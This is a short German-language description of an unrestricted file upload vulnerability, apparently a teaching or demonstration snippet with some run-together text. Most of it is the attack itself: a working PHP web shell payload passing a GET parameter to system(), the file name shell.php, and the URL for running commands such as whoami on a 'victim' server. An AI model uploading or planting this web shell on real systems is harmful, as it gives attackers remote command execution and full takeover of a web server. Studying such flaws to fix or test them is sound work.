Beschreibung: Diese Upload-Funktion speichert beliebige Dateien direkt im Verzeichnis uploads/ ohne jede Prüfung auf Typ oder Inhalt.
.php-Datei hochladen.http://victim/uploads/shell.phpDateiname: shell.php Inhalt: <?php system($_GET['cmd']); ?>
Nach dem Hochladen aufrufen mit:
http://victim/uploads/shell.php?cmd=whoami
Dieser Code demonstriert eine klassische unsichere Dateiupload-Schwachstelle. Sie kann zur vollständigen Übernahme des Webservers führen.